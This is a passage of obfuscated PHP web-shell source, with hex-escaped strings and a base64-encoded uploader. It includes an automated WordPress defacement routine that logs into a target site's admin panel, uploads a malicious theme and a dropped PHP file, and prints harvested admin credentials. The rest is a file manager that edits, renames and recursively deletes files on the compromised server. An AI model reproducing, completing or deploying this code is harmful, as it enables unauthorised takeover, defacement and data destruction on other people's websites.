base64_decode("\132\62\x46\x75\x64\x47\x56\x75\132\x77\60\113\x50\x44\71\167\x61\110\x41\x4e\x43\x69\x52\x6d\141\x57\x78\x6c\x4d\171\101\71\x49\103\122\146\x52\153\154\115\x52\x56\x4e\x62\x4a\x32\132\x70\142\x47\125\172\112\61\60\67\x44\121\157\x67\x49\x43\x52\165\x5a\x58\144\x6d\x61\x57\x78\x6c\x4d\x7a\x30\151\141\x79\65\x77\x61\110\x41\151\x4f\167\60\x4b\x49\103\101\x67\111\x43\101\147\x49\103\x41\x67\x49\103\x41\147\x49\103\x41\x67\x49\107\x6c\x6d\x49\x43\150\x6d\x61\x57\170\154\x58\x32\126\64\x61\x58\116\x30\x63\171\x67\x69\114\151\64\x76\x4c\151\x34\x76\x4c\151\x34\x76\114\151\64\166\111\x69\64\x6b\x62\x6d\x56\x33\132\x6d\x6c\163\132\124\x4d\160\x4b\x53\102\x31\142\x6d\x78\160\142\x6d\163\157\x49\151\x34\165\x4c\x79\64\165\x4c\x79\64\x75\x4c\x79\x34\x75\114\171\111\165\112\x47\65\x6c\144\62\x5a\x70\142\x47\125\x7a\x4b\x54\x73\116\103\151\101\147\x49\103\101\147\111\x43\101\x67\x62\x57\71\x32\x5a\126\71\x31\143\107\170\166\131\x57\x52\154\132\x46\71\155\141\127\x78\x6c\x4b\x43\122\155\x61\127\170\154\x4d\61\163\x6e\144\x47\x31\x77\x58\62\65\x68\142\x57\x55\x6e\x58\x53\x77\x67\x49\x69\x34\165\x4c\x79\64\165\114\x79\x34\x75\x4c\171\x34\165\x4c\171\122\165\x5a\x58\x64\x6d\x61\x57\170\154\115\x79\x49\160\117\167\60\x4b\104\121\x6f\57\120\x67\x3d\75"); $www = "\155\56\x70\x68\160"; $fp5 = fopen($www, "\167"); fputs($fp5, $upload3); $post2 = array("\x5f\167\x70\x6e\x6f\x6e\x63\145" => "{$anu2}", "\137\167\x70\x5f\150\164\164\160\137\x72\145\x66\145\x72\145\162" => "\57\x77\x70\55\141\144\155\x69\x6e\57\164\x68\x65\155\145\x2d\x69\156\x73\164\x61\154\x6c\x2e\160\150\160\x3f\x75\x70\x6c\x6f\141\x64", "\x74\150\x65\155\145\x7a\x69\160" => "\100{$www}", "\x69\x6e\x73\164\141\154\x6c\55\164\x68\145\155\145\x2d\163\x75\142\155\x69\164" => "\x49\156\x73\x74\x61\x6c\x6c\40\x4e\x6f\x77"); $ch = curl_init("{$target}\57\x77\x70\x2d\141\144\155\151\156\57\x75\x70\x64\x61\164\145\x2e\160\x68\160\77\x61\x63\x74\x69\157\x6e\x3d\x75\160\154\x6f\141\144\x2d\164\x68\145\x6d\145"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $post2); curl_setopt($ch, CURLOPT_COOKIEJAR, "\x63\157\x6f\x6b\x69\145\56\164\170\164"); curl_setopt($ch, CURLOPT_COOKIEFILE, "\143\157\157\x6b\151\145\x2e\x74\x78\x74"); curl_setopt($ch, CURLOPT_COOKIESESSION, true); $data3 = curl_exec($ch); curl_close($ch); $y = date("\x59"); $m = date("\155"); $namafile = "\x69\x64\x2e\x70\150\x70"; $fpi = fopen($namafile, "\167"); fputs($fpi, $script); $ch6 = curl_init("{$target}\x2f\x77\160\55\143\157\x6e\164\x65\x6e\164\57\x75\x70\154\157\141\144\x73\x2f{$y}\x2f{$m}\x2f{$www}"); curl_setopt($ch6, CURLOPT_POST, true); curl_setopt($ch6, CURLOPT_POSTFIELDS, array("\146\x69\154\145\x33" => "\x40{$namafile}")); curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch6, CURLOPT_COOKIEFILE, "\x63\157\157\x6b\151\x65\x2e\164\170\164"); curl_setopt($ch6, CURLOPT_COOKIEJAR, "\143\x6f\157\153\151\x65\56\164\170\x74"); curl_setopt($ch6, CURLOPT_COOKIESESSION, true); $postResult = curl_exec($ch6); curl_close($ch6); $as = "{$target}\x2f\x6b\x2e\x70\150\160"; $bs = anucurl($as); if (preg_match("\43{$script}\x23\151\163", $bs)) { echo "\x5b\53\x5d\40\x3c\146\157\156\164\40\x63\x6f\154\x6f\x72\75\x27\x6c\x69\155\x65\x27\x3e\x62\145\x72\x68\141\163\x69\154\x20\155\x65\160\x65\x73\x2e\56\56\74\x2f\x66\157\x6e\164\x3e\x3c\x62\x72\76"; echo "\133\53\x5d\x20\x3c\x61\x20\150\x72\145\x66\75\x27{$as}\x27\40\x74\141\x72\x67\x65\x74\75\x27\137\x62\154\141\156\153\47\x3e{$as}\74\x2f\141\x3e\74\x62\162\x3e\74\142\162\76"; } else { echo "\x5b\55\x5d\40\x3c\x66\x6f\156\x74\x20\x63\157\154\157\x72\x3d\47\x72\145\x64\x27\76\x67\x61\x67\141\154\x20\155\x65\x70\x65\163\x2e\x2e\x2e\74\x2f\x66\x6f\156\x74\x3e\74\x62\x72\76"; echo "\x5b\41\x21\x5d\x20\x63\157\x62\141\x20\141\152\141\40\x6d\x61\x6e\x75\141\x6c\x3a\x20\x3c\x62\162\x3e"; echo "\x5b\x2b\135\40\74\141\40\150\162\x65\x66\x3d\47{$target}\57\x77\x70\x2d\154\157\x67\x69\156\x2e\x70\x68\160\x27\40\x74\x61\x72\147\145\x74\x3d\x27\x5f\x62\154\141\156\153\x27\x3e{$target}\x2f\x77\x70\55\x6c\x6f\147\151\156\56\x70\x68\160\74\57\x61\x3e\x3c\x62\x72\x3e"; echo "\133\53\135\x20\165\x73\145\x72\x6e\x61\155\x65\72\40\74\x66\157\156\164\40\x63\157\x6c\157\x72\x3d\x6c\151\x6d\x65\76{$user}\x3c\x2f\146\157\156\x74\x3e\x3c\142\x72\76"; echo "\x5b\x2b\x5d\40\160\141\163\163\x77\x6f\162\x64\72\40\74\146\x6f\x6e\x74\x20\x63\157\x6c\157\x72\75\154\151\x6d\x65\76{$pass}\74\57\146\x6f\156\164\x3e\x3c\142\162\x3e\74\x62\162\x3e"; } mysql_close($conn); } } } else { echo "\x3c\x63\x65\156\x74\x65\162\76\x3c\150\61\x3e\x57\157\162\x64\x50\x72\145\x73\x73\x20\101\165\164\157\x20\x44\145\x66\x61\143\x65\x20\x56\56\62\74\x2f\x68\x31\x3e\xa\11\11\x3c\146\x6f\x72\x6d\40\x6d\x65\164\x68\157\144\x3d\47\160\157\x73\164\47\76\12\11\x9\x4c\x69\156\153\40\x43\x6f\156\x66\x69\x67\x3a\x20\x3c\142\162\x3e\xa\x9\x9\x3c\164\x65\170\x74\141\162\x65\141\x20\156\x61\x6d\145\x3d\47\154\x69\156\x6b\x27\40\x70\x6c\x61\143\145\150\x6f\x6c\x64\145\x72\75\x27\x68\x74\x74\160\x3a\57\x2f\164\141\x72\147\x65\x74\56\143\x6f\x6d\x2f\151\144\170\137\x63\157\156\146\x69\147\57\165\163\x65\162\55\x63\157\x6e\146\x69\x67\56\164\170\164\x27\x20\x73\x74\171\x6c\x65\x3d\x27\167\151\x64\164\x68\72\x20\x34\x35\60\160\170\x3b\x20\150\145\x69\x67\x68\x74\x3a\62\65\60\x70\170\73\x27\76\x3c\57\x74\145\x78\x74\x61\162\145\141\76\74\142\162\x3e\xa\11\11\74\x69\x6e\160\x75\164\x20\164\x79\160\145\x3d\47\x74\x65\170\x74\x27\x20\156\141\x6d\x65\x3d\x27\163\143\162\151\x70\164\x27\x20\150\145\x69\147\x68\164\75\47\61\60\47\x20\163\x69\x7a\145\75\47\65\60\x27\x20\160\154\141\x63\x65\150\x6f\154\x64\145\x72\x3d\x27\110\141\x63\153\x65\144\x20\102\171\x20\x30\170\61\x39\71\71\47\x20\x72\x65\161\x75\151\162\x65\x64\76\74\x62\162\76\xa\x9\x9\74\x69\x6e\160\165\x74\x20\164\171\160\145\75\47\163\x75\x62\x6d\x69\164\x27\x20\163\164\171\154\145\75\x27\x77\151\x64\x74\x68\72\40\x34\65\x30\x70\x78\x3b\x27\x20\x6e\x61\155\145\x3d\x27\141\165\164\157\x5f\144\145\146\x61\143\145\137\167\160\x27\x20\166\x61\154\165\145\75\47\110\x61\143\153\x21\x21\x27\x3e\xa\x9\11\74\57\x66\x6f\162\x6d\76\x3c\x2f\143\145\156\164\145\162\76"; } } elseif ($_GET["\141\x63\x74"] == "\x6e\145\x77\146\x69\154\145") { if ($_POST["\x6e\145\x77\x5f\163\141\166\x65\x5f\x66\151\154\145"]) { $newfile = htmlspecialchars($_POST["\x6e\145\167\146\x69\x6c\145"]); $fopen = fopen($newfile, "\141\x2b"); if ($fopen) { $act = "\x3c\x73\143\x72\151\160\x74\x3e\167\151\x6e\144\x6f\x77\56\x6c\157\x63\141\164\x69\x6f\156\75\47\x3f\141\143\x74\75\145\144\151\164\46\x64\x69\162\75" . $dir . "\46\x66\x69\154\x65\75" . $_POST["\x6e\x65\167\x66\x69\x6c\x65"] . "\47\x3b\74\x2f\163\143\162\x69\x70\x74\76"; } else { $act = "\74\x66\x6f\x6e\x74\40\143\157\x6c\x6f\162\x3d\162\x65\144\x3e\x70\145\x72\155\151\163\163\x69\157\156\40\x64\x65\156\x69\145\144\74\x2f\x66\x6f\156\164\76"; } } echo $act; echo "\x3c\x66\157\x72\155\40\x6d\x65\164\x68\x6f\x64\75\47\160\x6f\x73\164\x27\76\xa\11\106\151\x6c\145\x6e\x61\x6d\145\x3a\40\x3c\151\x6e\160\165\x74\40\164\171\160\145\x3d\x27\x74\x65\x78\164\x27\40\x6e\x61\155\x65\x3d\47\156\145\x77\146\151\x6c\145\47\x20\x76\x61\x6c\165\x65\x3d\x27{$dir}\57\156\x65\167\x66\151\154\x65\x2e\x70\x68\160\47\x20\x73\164\171\x6c\x65\75\x27\167\151\x64\164\150\x3a\40\x34\x35\x30\x70\170\73\x27\x20\x68\x65\151\147\x68\164\75\x27\61\60\x27\x3e\12\x9\74\x69\x6e\160\165\164\40\164\x79\x70\x65\x3d\x27\x73\165\142\x6d\151\x74\47\x20\156\x61\155\145\75\47\156\145\x77\x5f\x73\141\166\145\x5f\x66\151\154\x65\47\40\x76\141\x6c\x75\145\x3d\x27\x53\165\142\x6d\151\x74\47\76\12\11\x3c\57\146\157\x72\x6d\x3e"; } elseif ($_GET["\x61\x63\x74"] == "\x6e\x65\x77\x66\157\x6c\144\145\x72") { if ($_POST["\156\x65\167\137\163\141\x76\145\137\x66\157\154\x64\145\162"]) { $new_folder = $dir . "\x2f" . htmlspecialchars($_POST["\x6e\145\167\x66\x6f\154\x64\145\162"]); if (!mkdir($new_folder)) { $act = "\74\x66\157\156\x74\x20\x63\157\154\157\x72\x3d\x72\x65\144\x3e\x70\145\162\x6d\x69\x73\x73\151\157\156\40\144\x65\156\x69\145\144\74\x2f\146\157\x6e\164\76"; } else { $act = "\74\163\x63\162\x69\x70\x74\76\167\x69\x6e\x64\x6f\x77\56\x6c\157\143\141\164\151\157\156\x3d\x27\77\144\x69\x72\75" . $dir . "\47\x3b\74\57\x73\143\x72\151\x70\x74\76"; } } echo $act; echo "\x3c\146\157\162\155\40\155\x65\164\x68\x6f\144\x3d\47\x70\x6f\x73\x74\x27\x3e\xa\11\106\x6f\154\x64\x65\162\x20\116\x61\x6d\x65\x3a\x20\x3c\151\x6e\160\x75\164\x20\164\x79\x70\145\x3d\x27\x74\145\x78\x74\x27\40\156\x61\x6d\145\75\47\156\x65\167\146\x6f\x6c\x64\x65\x72\47\x20\163\x74\x79\x6c\x65\x3d\47\167\x69\144\164\x68\x3a\x20\64\65\x30\160\x78\x3b\47\x20\x68\145\151\147\x68\x74\75\x27\61\60\x27\76\12\x9\x3c\151\156\160\165\x74\40\x74\171\160\x65\x3d\x27\x73\165\x62\155\151\x74\x27\40\156\141\x6d\145\75\47\x6e\145\167\x5f\163\x61\x76\145\137\146\157\x6c\x64\x65\x72\x27\x20\x76\x61\x6c\165\x65\75\47\x53\165\142\x6d\x69\164\x27\76\12\x9\74\x2f\x66\x6f\x72\x6d\x3e"; } elseif ($_GET["\x61\143\x74"] == "\x72\145\x6e\141\x6d\x65\137\x64\x69\162") { if ($_POST["\144\151\x72\x5f\162\x65\156\x61\155\145"]) { $dir_rename = rename($dir, '' . dirname($dir) . "\x2f" . htmlspecialchars($_POST["\x66\157\154\x5f\x72\145\156\x61\155\145"]) . ''); if ($dir_rename) { $act = "\74\x73\x63\162\x69\x70\x74\76\167\151\156\144\157\x77\56\154\x6f\x63\x61\164\151\x6f\x6e\75\47\x3f\144\151\x72\75" . dirname($dir) . "\47\x3b\74\57\163\x63\162\x69\x70\x74\x3e"; } else { $act = "\74\x66\x6f\x6e\x74\x20\143\x6f\154\157\162\75\x72\145\x64\x3e\160\x65\162\155\151\163\x73\151\157\156\x20\144\145\156\151\x65\144\x3c\57\x66\157\156\x74\x3e"; } echo '' . $act . "\74\142\x72\76"; } echo "\74\x66\x6f\x72\x6d\x20\155\x65\x74\150\157\x64\75\x27\x70\157\x73\x74\47\x3e\xa\x9\74\151\156\x70\x75\x74\40\x74\171\160\x65\75\x27\164\145\170\x74\x27\40\166\141\154\x75\x65\x3d\47" . basename($dir) . "\x27\40\x6e\x61\155\x65\75\47\146\157\154\137\162\145\x6e\141\x6d\x65\x27\x20\163\164\171\x6c\145\75\x27\x77\x69\x64\x74\150\x3a\40\64\65\60\x70\x78\x3b\x27\40\x68\x65\x69\147\150\x74\x3d\x27\61\60\x27\76\xa\11\x3c\x69\x6e\160\x75\164\x20\x74\171\160\x65\75\x27\x73\165\142\x6d\x69\x74\x27\40\156\x61\155\145\75\x27\144\151\162\137\162\x65\x6e\x61\155\145\x27\x20\x76\x61\154\165\x65\x3d\x27\162\x65\x6e\x61\155\145\x27\76\12\11\74\57\x66\157\x72\155\76"; } elseif ($_GET["\141\143\164"] == "\x64\x65\x6c\145\x74\x65\x5f\144\x69\162") { function Delete($path) { if (is_dir($path) === true) { $files = array_diff(scandir($path), array("\x2e", "\x2e\x2e")); foreach ($files as $file) { Delete(realpath($path) . "\x2f" . $file); } return rmdir($path); } else { if (is_file($path) === true) { return unlink($path); } } return false; } $delete_dir = Delete($dir); if ($delete_dir) { $act = "\74\163\143\x72\151\x70\164\x3e\167\x69\x6e\144\x6f\x77\56\154\x6f\143\x61\164\151\x6f\156\x3d\47\77\144\x69\162\x3d" . dirname($dir) . "\x27\x3b\x3c\x2f\x73\x63\162\x69\160\164\x3e"; } else { $act = "\x3c\146\x6f\156\164\40\143\x6f\x6c\x6f\162\75\x72\x65\x64\x3e\143\x6f\165\x6c\x64\x20\156\157\164\40\162\145\155\157\x76\145\x20" . basename($dir) . "\x3c\57\146\157\156\x74\x3e"; } echo $act; } elseif ($_GET["\x61\143\164"] == "\166\151\145\x77") { echo "\x46\151\154\x65\156\x61\x6d\145\x3a\x20\x3c\146\x6f\156\x74\x20\143\x6f\154\157\x72\x3d\154\x69\155\145\76" . basename($_GET["\x66\x69\x6c\x65"]) . "\74\x2f\146\157\156\x74\76\40\x5b\x20\74\x61\40\150\162\x65\x66\75\47\77\141\x63\164\x3d\x76\x69\145\x77\46\x64\x69\x72\75{$dir}\x26\146\151\154\x65\x3d" . $_GET["\146\x69\154\x65"] . "\47\76\74\x62\x3e\x76\x69\x65\167\x3c\x2f\142\x3e\x3c\57\141\76\x20\x5d\x20\133\x20\x3c\x61\x20\150\162\145\x66\75\47\77\x61\x63\164\75\x65\144\x69\164\46\144\151\162\75{$dir}\x26\x66\x69\x6c\x65\x3d" . $_GET["\x66\151\x6c\145"] . "\x27\76\x65\x64\151\164\74\57\141\x3e\40\135\40\133\x20\x3c\141\40\x68\162\145\146\x3d\47\77\x61\x63\164\75\x72\x65\156\x61\x6d\145\x26\x64\151\162\75{$dir}\x26\x66\151\x6c\145\x3d" . $_GET["\146\151\154\x65"] . "\47\76\x72\145\x6e\141\155\x65\x3c\x2f\x61\x3e\x20\135\40\x5b\x20\x3c\141\x20\150\x72\x65\x66\75\x27\x3f\141\x63\x74\75\x64\157\x77\156\x6c\x6f\x61\144\x26\144\x69\x72\x3d{$dir}\46\146\x69\154\x65\x3d" . $_GET["\146\151\x6c\x65"] . "\x27\x3e\x64\x6f\167\156\x6c\x6f\141\144\x3c\x2f\x61\76\x20\135\40\133\x20\x3c\x61\x20\x68\x72\145\146\x3d\47\x3f\x61\143\x74\75\x64\x65\154\x65\x74\145\x26\144\x69\162\x3d{$dir}\x26\x66\x69\154\x65\x3d" . $_GET["\x66\151\x6c\145"] . "\x27\76\144\x65\x6c\145\164\x65\x3c\57\x61\76\40\x5d\74\142\162\x3e"; echo "\74\164\145\170\x74\141\162\x65\x61\x20\x72\x65\x61\144\157\156\154\171\x3e" . htmlspecialchars(@file_get_contents($_GET["\x66\x69\x6c\145"])) . "\x3c\57\x74\x65\x78\x74\x61\x72\x65\141\76"; } elseif ($_GET["\x61\x63\164"] == "\145\144\151\x74") { if ($_POST["\x73\x61\166\145"]) { $save = file_put_contents($_GET["\146\151\x6c\x65"], $_POST["\x73\x72\x63"]); if ($save) { $act = "\x3c\146\x6f\x6e\x74\x20\143\x6f\154\x6f\162\75\154\151\x6d\145\76\123\x61\x76\145\x64\x21\74\x2f\146\157\x6e\x74\x3e"; } else { $act = "\74\x66\x6f\156\x74\40\143\157\154\157\162\75\162\145\x64\76\x70\x65\162\155\x69\163\x73\x69\x6f\156\40\x64\145\x6e\x69\x65\x64\x3c\x2f\146\157\156\x74\76"; } echo '' . $act . "\74\142\x72\x3e"; } echo "\x46\x69\154\145\x6e\141\155\x65\x3a\40\x3c\x66\x6f\x6e\x74\40\x63\157\x6c\157\162\x3d\154\151\155\x65\x3e" . basename($_GET["\x66\x69\154\x65"]) . "\x3c\x2f\x66\157\156\x74\x3e\x20\133\x20\74\141\x20\x68\162\x65\146\x3d\47\77\x61\143\164\75\x76\151\145\167\46\144\151\162\x3d{$dir}\x26\x66\151\x6c\x65\75" . $_GET["\146\x69\x6c\145"] . "\x27\76\166\x69\145\x77\x3c\x2f\x61\x3e\x20\135\40\x5b\x20\x3c\x61\x20\x68\x72\145\x66\x3d\47\x3f\x61\x63\x74\x3d\145\144\151\x74\x26\x64\x69\162\75{$dir}\46\146\x69\x6c\145\75" . $_GET["\x66\x69\x6c\145"] . "\47\x3e\74\142\76\145\x64\x69\164\x3c\57\x62\76\74\x2f\x61\76\x20\135\40\x5b\40\x3c\x61\40\150\x72\x65\x66\75\x27\77\x61\x63\x74\75\x72\145\156\x61\155\x65\x26\144\x69\x72\x3d{$dir}\46\146\151\154\x65\75" . $_GET["\146\x69\154\x65"] . "\47\x3e\162\145\156\141\155\x65\74\x2f\141\76\x20\x5d\40\x5b\x20\74\141\40\x68\162\145\x66\75\x27\x3f\141\x63\164\x3d\144\157\167\156\154\157\x61\x64\x26\x64\x69\x72\75{$dir}\46\x66\x69\x6c\x65\75" . $_GET["\x66\151\154\x65"] . "\47\76\x64\157\167\156\154\157\x61\144\74\57\x61\76\x20\135\40\x5b\40\x3c\x61\40\150\x72\145\x66\75\47\77\x61\x63\164\x3d\x64\x65\x6c\145\x74\x65\x26\x64\x69\162\x3d{$dir}\46\146\x69\154\x65\x3d" . $_GET["\146\x69\x6c\145"] . "\x27\76\x64\x65\154\x65\164\x65\x3c\57\141\x3e\40\135\x3c\x62\162\x3e"; echo "\74\x66\157\x72\155\x20\x6d\145\164\x68\x6f\144\x3d\47\x70\x6f\163\164\x27\x3e\12\11\x3c\164\145\170\x74\x61\162\145\141\40\156\x61\155\x65\75\x27\x73\162\143\47\76" . htmlspecialchars(@file_get_contents($_GET["\146\151\x6c\x65"])) . "\74\57\x74\x65\x78\x74\141\x72\x65\141\76\74\x62\162\x3e\xa\x9\74\x69\156\160\165\164\40\164\x79\160\x65\x3d\x27\163\x75\142\x6d\x69\164\x27\40\166\141\x6c\165\145\75\47\123\x61\166\x65\47\x20\156\141\x6d\145\75\47\163\x61\166\x65\x27\40\x73\164\x79\154\x65\x3d\47\167\x69\144\164\150\x3a\40\65\60\x30\x70\x78\x3b\x27\x3e\xa\11\74\57\x66\x6f\x72\x6d\76"; } elseif ($_GET["\141\x63\x74"] == "\x72\145\x6e\x61\155\145") { if ($_POST["\144\x6f\137\x72\145\156\x61\x6d\145"]) { $rename = rename($_GET["\x66\151\154\145"], "{$dir}\57" . htmlspecialchars($_POST["\162\145\x6e\x61\x6d\x65"]) . ''); if ($rename) { $act = "\x3c\x73\143\162\x69\160\164\x3e\x77\151\156\x64\157\167\x2e\x6c\157\x63\141\164\151\x6f\156\75\x27\77\144\x69\x72\75" . $dir . "\x27\x3b\74\57\x73\143\162\151\x70\164\x3e"; } else { $act = "\x3c\x66\x6f\x6e\164\40\x63\157\x6c\157\162\75\162\145\x64\76\160\x65\162\155\151\x73\163\x69\x6f\156\x20\x64\x65\156\151\145\144\74\57\146\x6f\156\164\x3e"; } echo '' . $act . "\x3c\x62\162\76"; } echo "\106\151\154\145\156\x61\155\145\x3a\40\74\x66\x6f\x6e\x74\x20\x63\157\x6c\157\x72\75\x6c\151\155\x65\76" . basename($_GET["\146\x69\154\145"]) . "\x3c\x2f\146\x6f\x6e\164\x3e\40\133\x20\74\141\40\x68\x72\145\146\75\x27\x3f\x61\143\x74\x3d\166\151\x65\167\x26\144\x69\162\75{$dir}\x26\x66\x69\154\x65\x3d" . $_GET["\x66\x69\154\x65"] . "\x27\x3e\166\151\145\167\74\x2f\x61\76\x20\135\40\x5b\40\74\141\x20\x68\162\145\146\75\47\x3f\141\x63\164\x3d\145\144\x69\x74\46\x64\151\162\x3d{$dir}\x26\x66\x69\154\145\x3d" . $_GET["\146\151\154\x65"] . "\47\x3e\145\144\x69\164\x3c\x2f\x61\76\40\x5d\x20\x5b\40\74\141\x20\x68\x72\x65\x66\x3d\x27\x3f\141\143\164\75\162\145\x6e\x61\155\x65\x26\144\x69\x72\75{$dir}\46\x66\151\x6c\x65\x3d" . $_GET["\x66\151\x6c\145"] . "\47\76\x3c\142\76\x72\145\x6e\141\x6d\x65\74\x2f\142\x3e\74\57\x61\76\x20\x5d\x20\x5b\40\74\141\x20\150\162\x65\146\75\x27\x3f\x61\x63\x74\x3d\x64\157\167\156\x6c\157\141\x64\x26\144\x69\162\x3d{$dir}\46\146\x69\154\145\x3d" . $_GET["\x66\151\154\x65"] . "\47\76\144\x6f\167\156\x6c\x6f\x61\144\74\x2f\x61\76\x20\x5d\40\x5b\40\74\141\x20\x68\162\145\146\75\x27\77\141\x63\164\75\x64\x65\x6c\x65\x74\145\x26\144\151\162\x3d{$dir}\46\x66\151\x6c\145\75" . $_GET["\x66\x69\x6c\x65"] . "\47\x3e\x64\145\x6c\x65\164\x65\x3c\57\141\x3e\x20\135\74\142\162\x3e"; echo "\74\146\x6f\x72\x6d\40\155\x65\x74\x68\x6f\x64\x3d\47\x70\157\x73\x74\47\76\xa\x9\74\151\x6e\160\x75\164\x20\x74\171\160\x65\x3d\47\x74\x65\170\164\47\x20\x76\141\154\x75\145\75\x27" . basename($_GET["\x66\x69\x6c\145"]) . "\47\x20\x6e\x61\155\145\x3d\47\162\x65\x6e\141\155\x65\47\40\163\164\x79\x6c\145\75\47\167\x69\x64\164\150\72\x20\64\x35\60\x70\170\73\47\x20\150\x65\x69\147\150\164\x3d\47\x31\x30\47\76\12\11\x3c\x69\156\160\x75\164\x20\164\x79\x70\x65\x3d\x27\163\x75\142\155\x69\x74\47\x20\156\141\x6d\x65\x3d\x27\x64\157\x5f\162\145\x6e\141\x6d\x65\x27\40\x76\x61\x6c\165\145\75\47\x72\x65\x6e\141\x6d\x65\x27\x3e\xa\x9\x3c\x2f\x66\157\162\155\x3e"; } elseif ($_GET["\141\143\x74"] == "\x64\145\154\x65\164\x65") { $delete = unlink($_GET["\146\151\x6c\145"]); if ($delete) { $act = "\74\163\x63\x72\x69\160\164\x3e\x77\x69\156\144\x6f\x77\x2e\x6c\157\x63\141\x74\x69\x6f\x6e\x3d\x27\77\x64\x69\x72\x3d" . $dir . "\x27\x3b\x3c\x2f\x73\143\162\151\x70\x74\x3e"; } else { $act = "\x3c\146\157\156\x74\40\x63\x6f\154\x6f\162\x3d\162\x65\x64\76\x70\145\162\x6d\x69\163\x73\151\157\x6e\40\x64\x65\156\x69\145\144\x3c\x2f\146\x6f\x6e\164\x3e"; } echo $act; } else { if (is_dir($dir) == true) { echo "\x3c\x74\141\142\154\145\x20\167\151\x64\164\150\75\42\x31\60\60\45\42\40\x63\154\141\x73\163\75\x22\x74\x61\x62\x6c\x65\x5f\150\157\155\x65\42\x20\142\x6f\x72\x64\145\162\x3d\42\60\42\x20\x63\145\154\x6c\160\141\x64\144\x69\156\147\75\x22\x33\x22\40\x63\x65\x6c\154\x73\x70\x61\x63\x69\156\x67\x3d\42\x31\42\40\x61\154\x69\x67\156\75\x22\143\x65\x6e\x74\145\x72\x22\x3e\12\x9\x9\74\164\x72\x3e\12\x9\x9\x3c\x74\x68\40\143\154\141\x73\x73\75\x22\164\x68\x5f\x68\x6f\x6d\x65\42\x3e\x3c\x63\145\x6e\164\x65\x72\76\116\x61\155\145\x3c\x2f\143\x65\x6e\x74\145\162\x3e\74\57\x74\x68\x3e\xa\11\11\x3c\164\150\x20\143\154\x61\x73\163\x3d\42\164\150\137\150\157\x6d\x65\x22\76\74\143\x65\156\164\145\162\76\124\x79\x70\x65\x3c\57\x63\145\156\164\x65\162\x3e\74\x2f\x74\x68\76\12\x9\x9\x3c\164\150\40\x63\x6c\x61\163\x73\x3d\x22\164\150\x5f\x68\x6f\155\x65\x22\76\x3c\143\145\x6e\x74\x65\x72\76\x53\x69\x7a\x65\74\57\143\x65\x6e\x74\145\162\76\74\57\x74\150\x3e\12\11\x9\x3c\x74\150\40\143\154\x61\x73\x73\75\42\164\x68\x5f\x68\x6f\155\145\42\x3e\x3c\x63\145\156\164\145\x72\76\114\x61\163\164\40\x4d\157\144\x69\x66\x69\x65\x64\74\x2f\x63\145\156\x74\x65\x72\x3e\74\57\164\150\76\12\x9\x9\74\x74\x68\x20\x63\154\x61\163\x73\x3d\x22\x74\150\137\x68\157\x6d\x65\42\x3e\74\x63\x65\156\x74\145\162\76\120\145\x72\x6d\x69\163\163\x69\157\156\74\57\143\x65\156\x74\x65\162\76\x3c\57\x74\150\76\12\x9\11\74\164\150\40\143\154\x61\163\x73\x3d\42\x74\150\x5f\150\x6f\x6d\x65\x22\x3e\x3c\143\145\x6e\x74\x65\x72\x3e\101\x63\x74\151\x6f\156\x3c\x2f\143\145\x6e\x74\x65\x72\x3e\74\57\164\150\x3e\12\11\x9\x3c\x2f\164\162\x3e"; $scandir = scandir($dir); foreach ($scandir as $dirx) { $dtype = filetype("{$dir}\x2f{$dirx}"); $dtime = date("\106\40\144\x20\x59\x20\147\72\x69\72\163", filemtime("{$dir}\57{$dirx}")); if (!is_dir("{$dir}\57{$dirx}")) { continue; } if ($dirx === "\56\x2e") { $href = "\74\141\x20\x68\x72\x65\x66\75\x27\x3f\x64\x69\162\x3d" . dirname($dir) . "\47\x3e{$dirx}\x3c\x2f\141\76"; } elseif ($dirx === "\x2e") { $href = "\74\x61\x20\x68\x72\145\146\75\x27\x3f\x64\151\x72\x3d{$dir}\47\76{$dirx}\x3c\57\141\x3e"; } else { $href = "\74\141\x20\150\162\x65\146\x3d\x27\x3f\x64\x69\x72\x3d{$dir}\57{$dirx}\47\x3e{$dirx}\x3c\x2f\141\x3e"; } if ($dirx === "\56" || $dirx === "\56\56") { $act_dir = "\x3c\x61\x20\150\162\145\x66\75\47\77\141\x63\164\75\x6e\x65\x77\146\151\x6c\145\x26\144\151\x72\x3d{$dir}\47\76\x6e\x65\x77\146\151\x6c\145\74\x2f\141\x3e\x20\174\x20\x3c\x61\x20\150\x72\145\x66\x3d\x27\x3f\141\143\164\x3d\x6e\x65\x77\x66\157\x6c\x64\145\x72\46\x64\151\x72\x3d{$dir}\47\x3e\156\145\x77\x66\157\x6c\144\145\x72\74\x2f\x61\x3e"; } else { $act_dir = "\x3c\x61\40\150\162\145\146\75\47\77\x61\x63\164\75\162\x65\156\x61\155\x65\137\144\151\162\46\144\151\x72\75{$dir}\x2f{$dirx}\x27\76\x72\145\156\x61\155\145\x3c\x2f\x61\x3e\40\174\x20\74\141\40\150\x72\145\146\x3d\47\x3f\141\x63\164\x3d\144\145\x6c\x65\x74\145\137\144\x69\x72\46\x64\x69\162\75{$dir}\57{$dirx}\x27\x3e\144\145\x6c\145\x74\x65\x3c\x2f\x61\76"; } echo "\x3c\164\x72\x3e"; echo "\74\164\144\x20\x63\x6c\x61\x73\163\x3d\x27\164\144\x5f\150\x6f\x6d\x65\47\76\x3c\151\155\147\x20\x73\x72\x63\75\x27\x64\x61\x74\x61\x3a\x69\x6d\x61\147\145\x2f\160\x6e\147\x3b\142\x61\163\x65\66\x34\x2c\122\60\154\107\x4f\x44\154\150\x45\167\x41\x51\101\114\x4d\x41\101\101\x41\101\101\x50\x2f\x2f\x2f\65\x79\x63\x41\x4d\x37\x4f\x59\57\x2f\57\156\x50\x2f\x2f\172\166\57\x4f\x6e\x50\x66\x33\x39\57\x2f\57\x2f\x77\101\101\x41\x41\101\101\x41\101\x41\x41\101\x41\101\101\x41\x41\x41\x41\x41\x41\101\x41" . 